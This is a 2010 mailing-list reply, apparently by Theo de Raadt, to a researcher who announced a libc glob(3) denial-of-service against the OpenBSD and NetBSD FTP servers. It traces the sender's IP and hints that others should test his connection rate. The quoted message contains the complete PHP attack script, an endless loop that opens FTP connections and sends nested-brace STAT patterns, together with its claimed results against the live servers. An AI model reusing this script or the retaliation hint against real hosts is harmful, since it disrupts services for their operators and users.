It's rather astonishing what attempts to passfor a credible security
advisory today.

"oh, I made a lot of connections to the site and they blocked me."

Thank you, Maksymillian, for showing us all that you can execute a
denial of service attack from 90.156.82.13.

I wonder how many connections his site supports to his services. perhaps some
similar "security expert" can test his connection rate and let us all know.

# traceroute  -n 90.156.82.13
traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets
 1  129.128.5.2  6.906 ms  0.818 ms  1.444 ms
 2  129.128.3.194  0.306 ms  0.303 ms  0.306 ms
 3  129.128.3.130  0.345 ms  0.502 ms  0.656 ms
 4  129.128.3.170  0.502 ms  0.726 ms  1.443 ms
 5  64.42.209.114  5.628 ms  5.562 ms  5.272 ms
 6  216.18.32.13  6.337 ms  5.676 ms  5.752 ms
 7  66.59.190.198  18.936 ms  19.18 ms  18.523 ms
 8  66.59.190.18  18.384 ms  18.659 ms  18.426 ms
 9  67.69.199.105  17.797 ms  17.785 ms  18.111 ms
10  64.86.115.13  17.369 ms  17.651 ms  17.175 ms
11  216.6.98.29  68.828 ms  69.162 ms  69.146 ms
12  216.6.57.9  87.943 ms  87.828 ms  87.879 ms
13  195.219.69.29  175.930 ms  176.47 ms  175.804 ms
14  195.219.69.2  189.366 ms  176.757 ms  179.460 ms
15  195.219.180.6  193.562 ms  197.755 ms  197.880 ms
16  195.219.246.2  181.461 ms  201.536 ms  179.635 ms
17  83.238.251.56  177.432 ms  177.971 ms  177.115 ms
18  83.238.250.38  189.741 ms  190.70 ms  189.646 ms
19  83.238.250.12  191.123 ms  193.99 ms  192.135 ms
20  83.238.251.41  189.843 ms  189.805 ms  189.245 ms
21  87.204.248.202  188.981 ms  189.167 ms  459.987 ms
22  87.99.33.90  190.739 ms  190.637 ms  190.955 ms
23  87.99.32.202  190.180 ms  190.271 ms  190.160 ms
24  90.156.82.13  289.39 ms  331.276 ms  319.419 ms
^C
# host 90.156.82.13
13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl.
#




On 2 July 2010 15:47, Theo de Raadt <deraadt@cvs.openbsd.org> wrote:
quoted text
> OK, I am letting the maintainer of the site know, at the University Campus
> that you have just executed a denial of service against.
>
> I am surprised that you would go out of your way to declare so freely
> that you have purposely participated in a denial of service.
>
>> Return-Path: cxib@securityreason.com
>> Delivery-Date: Fri Jul  2 15:38:24 2010
>> Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163])
>>       by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472
>>       (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL)
>>       for <deraadt@cvs.openbsd.org>; Fri, 2 Jul 2010 15:38:24 -0600 (MDT)
>> Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8])
>>       by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931
>>       for <deraadt@openbsd.org>; Fri, 2 Jul 2010 15:38:17 -0600 (MDT)
>> Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1])
>>  by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70)
>>  id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200
>> Message-ID: <4C2E4E40.4080809@securityreason.com>
>> Date: Fri, 02 Jul 2010 22:38:24 +0200
>> From: Maksymilian Arciemowicz <cxib@securityreason.com>
>> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10)
Gecko/20100512 Thunderbird/3.0.5
quoted text
>> MIME-Version: 1.0
>> To: deraadt@openbsd.org, security@openbsd.org
>> Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
>> X-Enigmail-Version: 1.0.1
>> Content-Type: text/plain; charset=ISO-8859-1
>> Content-Transfer-Encoding: 7bit
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> <?php
>>
>> /* Libc/glob(3) denial-of-service
>> Maksymilian Arciemowicz from SecurityReason.com
>>
>> This script has been used to attack ftp.openbsd.org and ftp.netbsd.org
>>
>> Result (ftp.openbsd.org):
>> - - Connection refused
>>
>> and in the end
>>
>> # telnet ftp.openbsd.org 21
>> Trying 129.128.5.191...
>> Connected to ftp.openbsd.org.
>> Escape character is '^]'.
>> 421-  If you are seeing this message you have been blocked from using
>> 421- this ftp server - most likely for mirroring content without paying
>> 421- attention to what you were mirroring or where you should be mirroring
>> 421- it from, or for excessive connection rates.
>> 421- OpenBSD should *NOT* be mirrored from here, you should use
>> 421- a second level mirror as described in http://www.openbsd.org/ftp.html
>> 421
>>
>> Connection closed by foreign host.
>> #
>>
>> ;]
>>
>> Result (ftp.netbsd.org):
>> - - no more access for anonymous
>>
>> On 02.07.2010 20:29 CET, ftp.netbsd.org has return:
>> 530 User ftp access denied, connection limit of 160 reached.
>>
>>
>> Affter attack from one host
>>
>> */
>>
>> $conf['host']= $argv[1] ? $argv[1] : "HOST";
>> $conf['user'] =$argv[2] ? $argv[2] : "anonymous";
>> $conf['pass'] =$argv[3] ? $argv[3] : "max@cxib.net";
>> $conf['port']= $argv[4] ? $argv[4] : 21;
>>
>> $dirnames=array('A', 'B', 'C', 'D',
>> 'E','F','G','H','I','J','K','M','N','O','P');
>>
$pathsent="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{
..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c
x";
quoted text
>>
>> // fts_levelsumary
>> $fts_level=2;
>>
>> $created_directories=true;
>>
>> function attackglobinftp(){
>>       global $conf;
>>       global $dirnames;
>>       global $pathsent;
>>       global $fts_level;
>>       global $created_directories;
>>
>>       if (isset($conf['port']) and
>>       ($socket=socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) and
>>       (socket_connect($socket, $conf['host'], $conf['port']))){
>>
>>       echo "New connection opened\n";
>>       socket_write($socket,  "USER ".$conf['user']."\nPASS
".$conf['pass']."\n");
quoted text
>>
>> if(!$created_directories)
>>       for($stagc=0;$stagc < count($dirnames);$stagc++){
>>               for($ssdc=2;$ssdc--;){
>>                       socket_write($socket, "MKD
".$dirnames[$stagc]."\nCWD
quoted text
>> ".$dirnames[$stagc]."\n");
>>                       echo "MKD ".$dirnames[$stagc]."\nCWD
".$dirnames[$stagc]." for \n";
quoted text
>>                       echo socket_read($socket,10204);
>>                       echo $ssdc."\n";
>>               }
>>               for($ssdc=256;$ssdc--;){
>>                       socket_write($socket, "cwd ..\n");
>>                       echo socket_read($socket,10000);
>>               }
>>       }
>>       $created_directories=true;
>>
>>
>>       for($aoi=1; $aoi--;
>>       ){
>>               socket_write($socket, "STAT ".$pathsent."\n");
>>               echo "sent: STAT ".$pathsent."s\n";
>>       }
>>       sleep(5);
>> } else
>>       echo "Unable to connect\n";
>>
>> }
>>
>> while(1)
>>       attackglobinftp();
>> ?>
>>
>>
>> - --
>> Best Regards,
>> - ------------------------
>> pub   1024D/A6986BD6 2008-08-22
>> uid                  Maksymilian Arciemowicz (cxib)
>> <cxib@securityreason.com>
>> sub   4096g/0889FA9A 2008-08-22
>>
>> http://securityreason.com
>> http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
>> -----BEGIN PGP SIGNATURE-----
>>
>> iEYEARECAAYFAkwuTkAACgkQpiCeOKaYa9aafQCeNCpKgH3qFz0HscgNJ/JEunyS
>> I0EAnAxEcaMFSq4Kl0x3NSqzeuV1SP3p
>> =lx/r
>> -----END PGP SIGNATURE-----